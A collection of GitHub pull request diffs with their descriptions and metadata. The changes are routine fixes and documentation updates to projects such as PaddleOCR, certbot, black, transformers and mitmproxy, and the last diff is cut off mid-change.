Q3.3.37: 训练过程中,训练程序意外退出/挂起,应该如何解决? -**A**: 考虑内存,显存(使用GPU训练的话)是否不足,可在配置文件中,将训练和评估的batch size调小一些。需要注意,训练batch size调小时,学习率learning rate也要调小,一般可按等比例调整。 +#### Q2.2.10: 文档版面分析常用数据集有哪些? +**A**: 文档版面分析常用数据集常用数据集有PubLayNet、TableBank word、TableBank latex等。 -#### Q3.3.38: 训练程序启动后直到结束,看不到训练过程log? -**A**: 可以从以下三方面考虑: - 1. 检查训练进程是否正常退出、显存占用是否释放、是否有残留进程,如果确定是训练程序卡死,可以检查环境配置,遇到环境问题建议使用docker,可以参考说明文档[安装](https://github.com/PaddlePaddle/PaddleOCR/blob/release/2.1/doc/doc_ch/installation.md)。 - 2. 检查数据集的数据量是否太小,可调小batch size从而增加一个epoch中的训练step数量,或在训练config文件中,将参数print_batch_step改为1,即每一个step打印一次log信息。 - 3. 如果使用私有数据集训练,可先用PaddleOCR提供/推荐的数据集进行训练,排查私有数据集是否存在问题。 +#### Q2.3.23: 文档版面分析常用方法有哪些? 
+**A**: 文档版面分析通常使用通用目标检测方法,包括Faster RCNN系列,YOLO系列等。面向产业实践,建议使用PaddleDetection中精度和效率出色的PP-YOLO v2目标检测方法进行训练。 -#### Q3.3.39: 配置文件中的参数num workers是什么意思,应该如何设置? -**A**: 训练数据的读取需要硬盘IO,而硬盘IO速度远小于GPU运算速度,为了避免数据读取成为训练速度瓶颈,可以使用多进程读取数据,num workers表示数据读取的进程数量,0表示不使用多进程读取。在Linux系统下,多进程读取数据时,进程间通信需要基于共享内存,因此使用多进程读取数据时,建议设置共享内存不低于2GB,最好可以达到8GB,此时,num workers可以设置为CPU核心数。如果机器硬件配置较低,或训练进程卡死、dataloader报错,可以将num workers设置为0,即不使用多进程读取数据。 +#### Q2.3.24: 如何识别招牌或者广告图中的艺术字? +**A**: 招牌或者广告图中的艺术字是文本识别一个非常挑战的难题,因为艺术字中的单字和印刷体相比,变化非常大。如果需要识别的艺术字是在一个词典列表内,可以将改每个词典认为是一个待识别图像模板,通过通用图像检索识别系统解决识别问题。可以尝试使用PaddleClas的图像识别系统。 <a name="OCR精选10个问题"></a> @@ -187,6 +184,12 @@ #### Q2.1.14: 在识别模型中,为什么降采样残差结构的stride为(2, 1)? **A**: stride为(2, 1),表示在图像y方向(高度方向)上stride为2,x方向(宽度方向)上为1。由于待识别的文本图像通常为长方形,这样只在高度方向做下采样,尽量保留宽度方向的序列信息,避免宽度方向下采样后丢失过多的文字信息。 +#### Q2.1.15: 文本识别方法CRNN关键技术有哪些? +**A**: CRNN 关键技术包括三部分。(1)CNN提取图像卷积特征。(2)深层双向LSTM网络,在卷积特征的基础上继续提取文字序列特征。(3)Connectionist Temporal Classification(CTC),解决训练时字符无法对齐的问题。 + +#### Q2.1.16: 百度自研的SRN文本识别方法特点有哪些? +**A**: SRN文本识别方法特点主要有四个部分:(1)使用Transformer Units(TUs)模块加强图像卷积特征的表达能力。(2)提出Parallel Visual Attention Module(PVAM)模块挖掘特征之间的相互关系。(3)提出Global Semantic Reasoning Module(GSRM)模块挖掘识别结果语义相互关系。(4)提出Visual-Semantic Fusion Decoder(VSFD)模块有效融合PVAM提取的视觉特征和GSRM提取的语义特征。 + <a name="数据集2"></a> ### 数据集 @@ -225,6 +228,10 @@ #### Q2.2.9: 端到端算法PGNet使用的是什么类型的数据集呢? **A**: PGNet目前可以使用四点标注数据集,也可以使用多点标注数据集(十四点),多点标注训练的效果要比四点的好,一种可以尝试的策略是先在四点数据集上训练,之后用多点数据集在此基础上继续训练。 +#### Q2.2.10: 文档版面分析常用数据集有哪些? +**A**: 文档版面分析常用数据集常用数据集有PubLayNet、TableBank word、TableBank latex等。 + + <a name="模型训练调优2"></a> ### 模型训练调优 @@ -287,7 +294,7 @@ **A**:建议可以先了解OCR方向的基础知识,大概了解基础的检测和识别模型算法。然后在Github上可以查看OCR方向相关的repo。目前来看,从内容的完备性来看,PaddleOCR的中英文双语教程文档是有明显优势的,在数据集、模型训练、预测部署文档详实,可以快速入手。而且还有微信用户群答疑,非常适合学习实践。项目地址:[PaddleOCR](https://github.com/PaddlePaddle/PaddleOCR) -#### Q3.12:如何识别带空格的英文行文本图像? +#### Q2.3.12:如何识别带空格的英文行文本图像? **A**:空格识别可以考虑以下两种方案: @@ -338,6 +345,12 @@ 当然,知识蒸馏方法日新月异,也欢迎大家提出更多的总结与建议。 +#### Q2.3.23: 文档版面分析常用方法有哪些? +**A**: 文档版面分析通常使用通用目标检测方法,包括Faster RCNN系列,YOLO系列等。面向产业实践,建议使用PaddleDetection中精度和效率出色的PP-YOLO v2目标检测方法进行训练。 + +#### Q2.3.24: 如何识别招牌或者广告图中的艺术字? +**A**: 招牌或者广告图中的艺术字是文本识别一个非常挑战的难题,因为艺术字中的单字和印刷体相比,变化非常大。如果需要识别的艺术字是在一个词典列表内,可以将改每个词典认为是一个待识别图像模板,通过通用图像检索识别系统解决识别问题。可以尝试使用PaddleClas的图像识别系统。 + <a name="PaddleOCR实战问题"></a> ## 【实战篇】PaddleOCR实战问题 @@ -713,7 +726,6 @@ src_im= cv2.cvtColor(np.asarray(img), cv2.COLOR_RGB2BGR) **A**:文字识别主要有CTC和Attention两种方式,基于CTC的算法有CRNN、Rosetta、StarNet,基于Attention的方法有RARE、其他的算法PaddleOCR里没有提供复现代码。论文的链接可以参考:[PaddleOCR文本识别算法教程文档](https://github.com/PaddlePaddle/PaddleOCR/blob/release/2.1/doc/doc_ch/algorithm_overview.md#%E6%96%87%E6%9C%AC%E8%AF%86%E5%88%AB%E7%AE%97%E6%B3%95) - ### Q3.1.73: 如何使用TensorRT加速PaddleOCR预测? **A**: 目前paddle的dygraph分支已经支持了python和C++ TensorRT预测的代码,python端inference预测时把参数[--use_tensorrt=True](https://github.com/PaddlePaddle/PaddleOCR/blob/3ec57e8df9263de6fa897e33d2d91bc5d0849ef3/tools/infer/utility.py#L37)即可, @@ -753,7 +765,6 @@ linux系统共享内存位于/dev/shm目录下,如果内存不足,可以清 建议从[这里](https://paddle-inference.readthedocs.io/en/latest/user_guides/download_lib.html#linux)下载支持mlkdnn的CPU预测库。 - <a name="数据集3"></a> ### 数据集
https://api.github.com/repos/PaddlePaddle/PaddleOCR/pulls/3143
2021-06-21T12:37:30Z
2021-06-23T08:35:34Z
2021-06-23T08:35:34Z
2021-06-23T08:35:34Z
3,761
PaddlePaddle/PaddleOCR
42,304
Bugfix: brew_update_formula.py
diff --git a/thefuck/rules/brew_update_formula.py b/thefuck/rules/brew_update_formula.py index 2100c23b9..6b4f798b8 100644 --- a/thefuck/rules/brew_update_formula.py +++ b/thefuck/rules/brew_update_formula.py @@ -5,7 +5,8 @@ def match(command): return ('update' in command.script and "Error: This command updates brew itself" in command.output - and "Use 'brew upgrade <formula>'" in command.output) + and "Use 'brew upgrade" in command.output + and "instead" in command.output) def get_new_command(command):
Sample command output is: `Error: This command updates brew itself, and does not take formula names. Use 'brew upgrade thefuck' instead.` Because brew prints the actual formula name rather than a literal `<formula>` placeholder, the previous `"Use 'brew upgrade <formula>'" in command.output` test will never match.
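A quick standalone check (hypothetical snippet, not the rule's own code) of why the old substring test can never succeed against the quoted output while the relaxed one does:

```python
# brew prints the actual formula name, not the literal "<formula>" placeholder.
output = ("Error: This command updates brew itself, and does not take formula names. "
          "Use 'brew upgrade thefuck' instead.")

old_match = "Use 'brew upgrade <formula>'" in output               # False
new_match = "Use 'brew upgrade" in output and "instead" in output  # True
print(old_match, new_match)
```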
https://api.github.com/repos/nvbn/thefuck/pulls/710
2017-10-12T20:45:28Z
2017-10-15T14:39:54Z
2017-10-15T14:39:54Z
2023-01-05T21:10:31Z
153
nvbn/thefuck
30,573
Add an option to dns_rfc2136 plugin to specify an authoritative base domain.
diff --git a/CHANGELOG.md b/CHANGELOG.md index ac7f34a09e8..2f699feecb3 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -6,7 +6,9 @@ Certbot adheres to [Semantic Versioning](https://semver.org/). ### Added -* +* dns_rfc2136 plugin now supports explicitly specifing an authorative + base domain for cases when the automatic method does not work (e.g. + Split horizon DNS) ### Changed diff --git a/certbot-dns-rfc2136/certbot_dns_rfc2136/__init__.py b/certbot-dns-rfc2136/certbot_dns_rfc2136/__init__.py index 12b360959ff..cebff2841d3 100644 --- a/certbot-dns-rfc2136/certbot_dns_rfc2136/__init__.py +++ b/certbot-dns-rfc2136/certbot_dns_rfc2136/__init__.py @@ -21,8 +21,8 @@ ----------- Use of this plugin requires a configuration file containing the target DNS -server and optional port that supports RFC 2136 Dynamic Updates, the name -of the TSIG key, the TSIG key secret itself and the algorithm used if it's +server, optional authorative domain and optional port that supports RFC 2136 Dynamic Updates, +the name of the TSIG key, the TSIG key secret itself and the algorithm used if it's different to HMAC-MD5. .. code-block:: ini @@ -33,6 +33,8 @@ dns_rfc2136_server = 192.0.2.1 # Target DNS port dns_rfc2136_port = 53 + # Authorative domain (optional, will try to auto-detect if missing) + dns_rfc2136_base_domain = example.com # TSIG key name dns_rfc2136_name = keyname. # TSIG key secret diff --git a/certbot-dns-rfc2136/certbot_dns_rfc2136/dns_rfc2136.py b/certbot-dns-rfc2136/certbot_dns_rfc2136/dns_rfc2136.py index 2061374e0e8..5db8c3020a3 100644 --- a/certbot-dns-rfc2136/certbot_dns_rfc2136/dns_rfc2136.py +++ b/certbot-dns-rfc2136/certbot_dns_rfc2136/dns_rfc2136.py @@ -79,25 +79,33 @@ def _cleanup(self, _domain, validation_name, validation): self._get_rfc2136_client().del_txt_record(validation_name, validation) def _get_rfc2136_client(self): + key = _RFC2136Key(self.credentials.conf('name'), + self.credentials.conf('secret'), + self.ALGORITHMS.get(self.credentials.conf('algorithm'), + dns.tsig.HMAC_MD5)) return _RFC2136Client(self.credentials.conf('server'), int(self.credentials.conf('port') or self.PORT), - self.credentials.conf('name'), - self.credentials.conf('secret'), - self.ALGORITHMS.get(self.credentials.conf('algorithm'), - dns.tsig.HMAC_MD5)) + key, + self.credentials.conf('base-domain')) +class _RFC2136Key(object): + def __init__(self, name, secret, algorithm): + self.name = name + self.secret = secret + self.algorithm = algorithm class _RFC2136Client(object): """ Encapsulates all communication with the target DNS server. """ - def __init__(self, server, port, key_name, key_secret, key_algorithm): + def __init__(self, server, port, base_domain, key): self.server = server self.port = port self.keyring = dns.tsigkeyring.from_text({ - key_name: key_secret + key.name: key.secret }) - self.algorithm = key_algorithm + self.algorithm = key.algorithm + self.base_domain = base_domain def add_txt_record(self, record_name, record_content, record_ttl): """ @@ -171,23 +179,33 @@ def del_txt_record(self, record_name, record_content): def _find_domain(self, record_name): """ - Find the closest domain with an SOA record for a given domain name. + If 'base_domain' option is specified check if the requested domain matches this base domain + and return it. If not explicitly specified find the closest domain with an SOA record for + the given domain name. - :param str record_name: The record name for which to find the closest SOA record. 
+ :param str record_name: The record name for which to find the base domain. :returns: The domain, if found. :rtype: str :raises certbot.errors.PluginError: if no SOA record can be found. """ - domain_name_guesses = dns_common.base_domain_name_guesses(record_name) + if self.base_domain: + if not record_name.endswith(self.base_domain): + raise errors.PluginError('Requested domain {0} does not match specified base ' + 'domain {1}.' + .format(record_name, self.base_domain)) + else: + return self.base_domain + else: + domain_name_guesses = dns_common.base_domain_name_guesses(record_name) - # Loop through until we find an authoritative SOA record - for guess in domain_name_guesses: - if self._query_soa(guess): - return guess + # Loop through until we find an authoritative SOA record + for guess in domain_name_guesses: + if self._query_soa(guess): + return guess - raise errors.PluginError('Unable to determine base domain for {0} using names: {1}.' - .format(record_name, domain_name_guesses)) + raise errors.PluginError('Unable to determine base domain for {0} using names: {1}.' + .format(record_name, domain_name_guesses)) def _query_soa(self, domain_name): """ diff --git a/certbot-dns-rfc2136/certbot_dns_rfc2136/dns_rfc2136_test.py b/certbot-dns-rfc2136/certbot_dns_rfc2136/dns_rfc2136_test.py index d800f1ec7c2..bed3445b69e 100644 --- a/certbot-dns-rfc2136/certbot_dns_rfc2136/dns_rfc2136_test.py +++ b/certbot-dns-rfc2136/certbot_dns_rfc2136/dns_rfc2136_test.py @@ -73,9 +73,12 @@ def test_valid_algorithm_passes(self): class RFC2136ClientTest(unittest.TestCase): def setUp(self): - from certbot_dns_rfc2136.dns_rfc2136 import _RFC2136Client + from certbot_dns_rfc2136.dns_rfc2136 import _RFC2136Client, _RFC2136Key - self.rfc2136_client = _RFC2136Client(SERVER, PORT, NAME, SECRET, dns.tsig.HMAC_MD5) + self.rfc2136_client = _RFC2136Client(SERVER, + PORT, + None, + _RFC2136Key(NAME, SECRET, dns.tsig.HMAC_MD5)) @mock.patch("dns.query.tcp") def test_add_txt_record(self, query_mock): @@ -162,6 +165,28 @@ def test_find_domain_wraps_errors(self): self.rfc2136_client._find_domain, 'foo.bar.'+DOMAIN) + def test_find_domain_with_base(self): + # _query_soa | pylint: disable=protected-access + self.rfc2136_client._query_soa = mock.MagicMock(side_effect=[False, False, True]) + self.rfc2136_client.base_domain = 'bar.' + DOMAIN + + # _find_domain | pylint: disable=protected-access + domain = self.rfc2136_client._find_domain('foo.bar.' + DOMAIN) + + self.assertTrue(domain == 'bar.' + DOMAIN) + + def test_find_domain_with_wrong_base(self): + + # _query_soa | pylint: disable=protected-access + self.rfc2136_client._query_soa = mock.MagicMock(side_effect=[False, False, True]) + self.rfc2136_client.base_domain = 'wrong.' + DOMAIN + + self.assertRaises( + errors.PluginError, + # _find_domain | pylint: disable=protected-access + self.rfc2136_client._find_domain, + 'foo.bar.' + DOMAIN) + @mock.patch("dns.query.udp") def test_query_soa_found(self, query_mock): query_mock.return_value = mock.MagicMock(answer=[mock.MagicMock()], flags=dns.flags.AA)
Added an option to the dns_rfc2136 plugin to explicitly specify the base domain for which the DNS server is authoritative. This solves problems with split-horizon DNS configurations, which do not correctly report authoritative SOA records when queried without a TSIG key. It could be useful for other use cases as well.
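A minimal standalone sketch of the new lookup logic (hypothetical function name; the real implementation lives in `_RFC2136Client._find_domain`): when a base domain is configured it is validated and returned directly, otherwise the plugin falls back to guessing via SOA queries.

```python
# Sketch of the base-domain short-circuit introduced in this PR.
def find_domain(record_name: str, base_domain: str = None) -> str:
    if base_domain:
        if not record_name.endswith(base_domain):
            raise ValueError(f"Requested domain {record_name} does not match "
                             f"specified base domain {base_domain}.")
        return base_domain
    # Without an explicit base domain, walk parent names and query for an
    # authoritative SOA record (omitted in this sketch).
    raise NotImplementedError

print(find_domain("_acme-challenge.www.example.com", base_domain="example.com"))
```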
https://api.github.com/repos/certbot/certbot/pulls/7029
2019-05-06T13:05:29Z
2019-05-16T08:40:18Z
2019-05-16T08:40:18Z
2019-05-16T08:45:35Z
2,034
certbot/certbot
2,384
[CI] implement job skipping for doc-only PRs
diff --git a/.circleci/config.yml b/.circleci/config.yml index aedbe4f553985..f3b13d26eb524 100644 --- a/.circleci/config.yml +++ b/.circleci/config.yml @@ -3,6 +3,22 @@ orbs: gcp-gke: circleci/gcp-gke@1.0.4 go: circleci/go@1.3.0 +commands: + skip-job-on-doc-only-changes: + description: "Do not continue this job and exit with success for PRs with only doc changes" + steps: + + - run: + name: docs-only changes skip check + command: | + if git diff --name-only << pipeline.git.base_revision >>...<< pipeline.git.revision >> | egrep -qv '\.(md|rst)$' + then + echo "Non-docs were modified in this PR, proceeding normally" + else + echo "Only docs were modified in this PR, quitting this job" + circleci step halt + fi + # TPU REFERENCES references: checkout_ml_testing: &checkout_ml_testing @@ -72,6 +88,7 @@ jobs: parallelism: 1 steps: - checkout + - skip-job-on-doc-only-changes - restore_cache: keys: - v0.4-torch_and_tf-{{ checksum "setup.py" }} @@ -98,6 +115,7 @@ jobs: parallelism: 1 steps: - checkout + - skip-job-on-doc-only-changes - restore_cache: keys: - v0.4-torch-{{ checksum "setup.py" }} @@ -124,6 +142,7 @@ jobs: parallelism: 1 steps: - checkout + - skip-job-on-doc-only-changes - restore_cache: keys: - v0.4-tf-{{ checksum "setup.py" }} @@ -150,6 +169,7 @@ jobs: parallelism: 1 steps: - checkout + - skip-job-on-doc-only-changes - restore_cache: keys: - v0.4-flax-{{ checksum "setup.py" }} @@ -176,6 +196,7 @@ jobs: parallelism: 1 steps: - checkout + - skip-job-on-doc-only-changes - restore_cache: keys: - v0.4-torch-{{ checksum "setup.py" }} @@ -202,6 +223,7 @@ jobs: parallelism: 1 steps: - checkout + - skip-job-on-doc-only-changes - restore_cache: keys: - v0.4-tf-{{ checksum "setup.py" }} @@ -226,6 +248,7 @@ jobs: RUN_CUSTOM_TOKENIZERS: yes steps: - checkout + - skip-job-on-doc-only-changes - restore_cache: keys: - v0.4-custom_tokenizers-{{ checksum "setup.py" }} @@ -253,6 +276,7 @@ jobs: parallelism: 1 steps: - checkout + - skip-job-on-doc-only-changes - restore_cache: keys: - v0.4-torch_examples-{{ checksum "setup.py" }}
Let's save some time and money. This PR:

* [x] skips most jobs when the only change is in `\.(md|rst)$` files.

I tested this with various types of files and it seems to do the right thing. But if we merge, let's monitor that I didn't miss some use case and we don't end up with a broken master because some CI jobs didn't run.

- pros: obvious
- cons: I don't like that the skipped CI job's status appears as completed normally, even though it didn't really run. Let's hope CircleCI comes up with a better way of indicating that the job was skipped.

---------------

How it was done: `git merge-base --fork-point master` to get the commit range didn't work at all, even though that's what we use for the `fixup` `Makefile` target. Other suggestions I found didn't work either. In the end I found https://circleci.com/docs/2.0/pipeline-variables/ to get the correct commit range:

```
git diff --name-only << pipeline.git.base_revision >>...<< pipeline.git.revision >>
```

and now all is good.

**credits**: the `circleci step halt` idea comes from this blog: https://yu-ishikawa.medium.com/reusable-a-circleci-command-to-halt-if-no-changed-target-files-e87c6b0af82b

@LysandreJik, @sgugger
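For illustration only, a standalone Python sketch (made-up file names) mirroring the `egrep -qv '\.(md|rst)$'` filter used above: the job is halted only when no changed file survives the docs filter.

```python
# Keep files that are NOT .md/.rst; an empty result means the PR is docs-only.
import re

changed_files = ["docs/source/quicktour.rst", "README.md"]  # hypothetical diff output
non_docs = [f for f in changed_files if not re.search(r"\.(md|rst)$", f)]
print("halt this job" if not non_docs else "run tests normally")
```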
https://api.github.com/repos/huggingface/transformers/pulls/8826
2020-11-27T21:43:37Z
2020-11-29T16:31:30Z
2020-11-29T16:31:30Z
2020-12-01T06:46:48Z
754
huggingface/transformers
12,824
Fix cache file length
diff --git a/CHANGES.md b/CHANGES.md index 9a9be4bbeae..e4240eacfca 100644 --- a/CHANGES.md +++ b/CHANGES.md @@ -18,6 +18,9 @@ <!-- Changes to how Black can be configured --> +- Shorten the length of the name of the cache file to fix crashes on file systems that + do not support long paths (#4176) + ### Packaging <!-- Changes to how Black is packaged, such as dependency requirements --> diff --git a/src/black/cache.py b/src/black/cache.py index cfdbc21e92a..35bddb573d2 100644 --- a/src/black/cache.py +++ b/src/black/cache.py @@ -13,6 +13,7 @@ from _black_version import version as __version__ from black.mode import Mode +from black.output import err if sys.version_info >= (3, 11): from typing import Self @@ -64,7 +65,13 @@ def read(cls, mode: Mode) -> Self: resolve the issue. """ cache_file = get_cache_file(mode) - if not cache_file.exists(): + try: + exists = cache_file.exists() + except OSError as e: + # Likely file too long; see #4172 and #4174 + err(f"Unable to read cache file {cache_file} due to {e}") + return cls(mode, cache_file) + if not exists: return cls(mode, cache_file) with cache_file.open("rb") as fobj: diff --git a/src/black/mode.py b/src/black/mode.py index 68919fb4901..128d2b9f108 100644 --- a/src/black/mode.py +++ b/src/black/mode.py @@ -192,6 +192,9 @@ class Deprecated(UserWarning): """Visible deprecation warning.""" +_MAX_CACHE_KEY_PART_LENGTH: Final = 32 + + @dataclass class Mode: target_versions: Set[TargetVersion] = field(default_factory=set) @@ -228,6 +231,19 @@ def get_cache_key(self) -> str: ) else: version_str = "-" + if len(version_str) > _MAX_CACHE_KEY_PART_LENGTH: + version_str = sha256(version_str.encode()).hexdigest()[ + :_MAX_CACHE_KEY_PART_LENGTH + ] + features_and_magics = ( + ",".join(sorted(f.name for f in self.enabled_features)) + + "@" + + ",".join(sorted(self.python_cell_magics)) + ) + if len(features_and_magics) > _MAX_CACHE_KEY_PART_LENGTH: + features_and_magics = sha256(features_and_magics.encode()).hexdigest()[ + :_MAX_CACHE_KEY_PART_LENGTH + ] parts = [ version_str, str(self.line_length), @@ -236,10 +252,7 @@ def get_cache_key(self) -> str: str(int(self.is_ipynb)), str(int(self.skip_source_first_line)), str(int(self.magic_trailing_comma)), - sha256( - (",".join(sorted(f.name for f in self.enabled_features))).encode() - ).hexdigest(), str(int(self.preview)), - sha256((",".join(sorted(self.python_cell_magics))).encode()).hexdigest(), + features_and_magics, ] return ".".join(parts) diff --git a/tests/test_black.py b/tests/test_black.py index 6dbe25a90b6..123ea0bb88a 100644 --- a/tests/test_black.py +++ b/tests/test_black.py @@ -44,6 +44,7 @@ from black import re_compile_maybe_verbose as compile_pattern from black.cache import FileData, get_cache_dir, get_cache_file from black.debug import DebugVisitor +from black.mode import Mode, Preview from black.output import color_diff, diff from black.report import Report @@ -2065,6 +2066,30 @@ def test_get_cache_dir( monkeypatch.setenv("BLACK_CACHE_DIR", str(workspace2)) assert get_cache_dir().parent == workspace2 + def test_cache_file_length(self) -> None: + cases = [ + DEFAULT_MODE, + # all of the target versions + Mode(target_versions=set(TargetVersion)), + # all of the features + Mode(enabled_features=set(Preview)), + # all of the magics + Mode(python_cell_magics={f"magic{i}" for i in range(500)}), + # all of the things + Mode( + target_versions=set(TargetVersion), + enabled_features=set(Preview), + python_cell_magics={f"magic{i}" for i in range(500)}, + ), + ] + for case in cases: + cache_file = 
get_cache_file(case) + # Some common file systems enforce a maximum path length + # of 143 (issue #4174). We can't do anything if the directory + # path is too long, but ensure the name of the cache file itself + # doesn't get too crazy. + assert len(cache_file.name) <= 96 + def test_cache_broken_file(self) -> None: mode = DEFAULT_MODE with cache_dir() as workspace:
- Ensure total file length stays under 96
- Hash the path only if it's too long
- Proceed normally (with a warning) if the cache can't be read

Fixes #4172
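A rough standalone sketch of the second bullet (hypothetical helper; the real logic lives in `Mode.get_cache_key`): a cache-key part is hashed only when it exceeds a fixed length, so common configurations keep short, readable file names.

```python
from hashlib import sha256

MAX_PART = 32  # mirrors _MAX_CACHE_KEY_PART_LENGTH in the patch

def shorten(part: str) -> str:
    # Short parts pass through unchanged; long parts become a fixed-length digest.
    if len(part) <= MAX_PART:
        return part
    return sha256(part.encode()).hexdigest()[:MAX_PART]

print(shorten("PY37-PY38"))                                 # unchanged
print(shorten(",".join(f"magic{i}" for i in range(500))))   # 32-char digest
```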
https://api.github.com/repos/psf/black/pulls/4176
2024-01-26T15:38:51Z
2024-01-26T19:54:49Z
2024-01-26T19:54:49Z
2024-01-26T19:54:54Z
1,171
psf/black
23,909
MNT fix generate_authors_table.py
diff --git a/build_tools/generate_authors_table.py b/build_tools/generate_authors_table.py index 81e99856c6890..eaad1df75475c 100644 --- a/build_tools/generate_authors_table.py +++ b/build_tools/generate_authors_table.py @@ -11,6 +11,7 @@ import getpass import time from pathlib import Path +from os import path print("user:", file=sys.stderr) user = input() @@ -18,7 +19,7 @@ auth = (user, passwd) LOGO_URL = 'https://avatars2.githubusercontent.com/u/365630?v=4' -REPO_FOLDER = Path(__file__).parent.parent +REPO_FOLDER = Path(path.abspath(__file__)).parent.parent def get(url): @@ -100,7 +101,6 @@ def get_profile(login): 'Duchesnay': 'Edouard Duchesnay', 'Lars': 'Lars Buitinck', 'MechCoder': 'Manoj Kumar', - 'jeremiedbb': 'Jérémie Du Boisberranger', } if profile["name"] in missing_names: profile["name"] = missing_names[profile["name"]] diff --git a/doc/authors.rst b/doc/authors.rst index 6a03871d67e90..7b5426fe3128d 100644 --- a/doc/authors.rst +++ b/doc/authors.rst @@ -7,7 +7,7 @@ </style> <div> <a href='https://github.com/jeremiedbb'><img src='https://avatars2.githubusercontent.com/u/34657725?v=4' class='avatar' /></a> <br /> - <p>Jérémie Du Boisberranger</p> + <p>Jérémie du Boisberranger</p> </div> <div> <a href='https://github.com/jorisvandenbossche'><img src='https://avatars2.githubusercontent.com/u/1020496?v=4' class='avatar' /></a> <br />
A part of #17010. I think we should also either put @cmarmo in the authors list, or have a triage team section.
https://api.github.com/repos/scikit-learn/scikit-learn/pulls/17011
2020-04-23T09:08:25Z
2020-04-27T14:12:30Z
2020-04-27T14:12:30Z
2020-04-27T18:31:16Z
477
scikit-learn/scikit-learn
46,800
Add NBP currency exchange rates API
diff --git a/README.md b/README.md index af59232146..25221681ea 100644 --- a/README.md +++ b/README.md @@ -231,6 +231,7 @@ API | Description | Auth | HTTPS | CORS | | [Exchangeratesapi.io](https://exchangeratesapi.io) | Exchange rates with currency conversion | No | Yes | Yes | | [Fixer.io](http://fixer.io) | Exchange rates and currency conversion | `apiKey` | Yes | Unknown | | [Frankfurter](https://www.frankfurter.app/docs) | Exchange rates, currency conversion and time series | No | Yes | Yes | +| [National Bank of Poland](http://api.nbp.pl/en.html) | A collection of currency exchange rates (data in XML and JSON) | No | Yes | Yes | | [ratesapi](https://ratesapi.io) | Free exchange rates and historical rates | No | Yes | Unknown | | [VATComply.com](https://www.vatcomply.com/documentation) | Exchange rates, geolocation and VAT number validation | No | Yes | Yes |
Add NBP (National Bank of Poland) currency exchange rates API

- [x] My submission is formatted according to the guidelines in the [contributing guide](CONTRIBUTING.md)
- [x] My addition is ordered alphabetically
- [x] My submission has a useful description
- [x] The description does not end with punctuation
- [x] Each table column is padded with one space on either side
- [x] I have searched the repository for any relevant issues or pull requests
- [x] Any category I am creating has the minimum requirement of 3 items
- [x] All changes have been [squashed][squash-link] into a single commit

[squash-link]: <https://github.com/todotxt/todo.txt-android/wiki/Squash-All-Commits-Related-to-a-Single-Issue-into-a-Single-Commit>
https://api.github.com/repos/public-apis/public-apis/pulls/1630
2021-04-10T20:41:52Z
2021-04-29T07:15:17Z
2021-04-29T07:15:17Z
2021-04-29T07:15:17Z
246
public-apis/public-apis
35,477
Bug fix: export alignments.json file with the save-interval option.
diff --git a/scripts/extract.py b/scripts/extract.py index 4f81ef7f12..4ca7e32489 100644 --- a/scripts/extract.py +++ b/scripts/extract.py @@ -191,7 +191,7 @@ def run_extraction(self): if self.extractor.final_pass: self.output_processing(faces, align_eyes, size, filename) self.output_faces(filename, faces) - if self.save_interval and idx + 1 % self.save_interval == 0: + if self.save_interval and (idx + 1) % self.save_interval == 0: self.alignments.save() else: del faces["image"]
One-liner fix. The modulo operation has higher precedence than the addition; because the parentheses were missing, the condition was never met. Because of this, even if we run the extract script with the `save-interval` option, the alignments.json file is never generated. Fixes https://github.com/deepfakes/faceswap/issues/739
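A tiny standalone illustration of the precedence issue (values are made up): `%` binds tighter than `+`, so without parentheses the check effectively compares `idx + 1` against zero instead of testing divisibility.

```python
idx, save_interval = 9, 10

buggy = idx + 1 % save_interval == 0    # (idx + (1 % save_interval)) == 0 -> never True for idx >= 0
fixed = (idx + 1) % save_interval == 0  # True once every `save_interval` frames
print(buggy, fixed)                     # False True
```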
https://api.github.com/repos/deepfakes/faceswap/pulls/740
2019-05-30T13:58:51Z
2019-05-30T14:32:57Z
2019-05-30T14:32:57Z
2019-05-30T14:32:57Z
150
deepfakes/faceswap
18,795
Fixing a typo ("termnial" -> "terminal")
diff --git a/docs/source/getting_started/example_scenes.rst b/docs/source/getting_started/example_scenes.rst index 7df94b643d..e51621c58f 100644 --- a/docs/source/getting_started/example_scenes.rst +++ b/docs/source/getting_started/example_scenes.rst @@ -23,7 +23,7 @@ InteractiveDevlopment self.play(ShowCreation(square)) self.wait() - # This opens an iPython termnial where you can keep writing + # This opens an iPython terminal where you can keep writing # lines as if they were part of this construct method. # In particular, 'square', 'circle' and 'self' will all be # part of the local namespace in that terminal. diff --git a/example_scenes.py b/example_scenes.py index a871915f9e..d297ca335d 100644 --- a/example_scenes.py +++ b/example_scenes.py @@ -593,7 +593,7 @@ def construct(self): self.play(ShowCreation(square)) self.wait() - # This opens an iPython termnial where you can keep writing + # This opens an iPython terminal where you can keep writing # lines as if they were part of this construct method. # In particular, 'square', 'circle' and 'self' will all be # part of the local namespace in that terminal.
## Motivation

I fixed a typo in the documentation.

## Proposed changes

I fixed a single typo "termnial" in the documentation.

## Test

It is a documentation change.
https://api.github.com/repos/3b1b/manim/pulls/1872
2022-09-30T20:29:41Z
2022-10-01T08:07:09Z
2022-10-01T08:07:09Z
2022-10-01T08:07:09Z
322
3b1b/manim
18,507
Fix #3002. Auto-expanding for tilde.
diff --git a/mitmproxy/addons/cut.py b/mitmproxy/addons/cut.py index 7d9a1f361b..6bb52e844a 100644 --- a/mitmproxy/addons/cut.py +++ b/mitmproxy/addons/cut.py @@ -1,6 +1,8 @@ import io import csv import typing +import os.path + from mitmproxy import command from mitmproxy import exceptions from mitmproxy import flow @@ -87,7 +89,8 @@ def save( append = False if path.startswith("+"): append = True - path = mitmproxy.types.Path(path[1:]) + epath = os.path.expanduser(path[1:]) + path = mitmproxy.types.Path(epath) try: if len(cuts) == 1 and len(flows) == 1: with open(path, "ab" if append else "wb") as fp: diff --git a/mitmproxy/addons/view.py b/mitmproxy/addons/view.py index 6da17b5bdc..beaadcc6de 100644 --- a/mitmproxy/addons/view.py +++ b/mitmproxy/addons/view.py @@ -10,7 +10,6 @@ """ import collections import typing -import os import blinker import sortedcontainers @@ -359,9 +358,8 @@ def load_file(self, path: mitmproxy.types.Path) -> None: """ Load flows into the view, without processing them with addons. """ - spath = os.path.expanduser(path) try: - with open(spath, "rb") as f: + with open(path, "rb") as f: for i in io.FlowReader(f).stream(): # Do this to get a new ID, so we can load the same file N times and # get new flows each time. It would be more efficient to just have a diff --git a/mitmproxy/types.py b/mitmproxy/types.py index 2d66bb8ec1..23320c1213 100644 --- a/mitmproxy/types.py +++ b/mitmproxy/types.py @@ -178,7 +178,7 @@ def completion(self, manager: 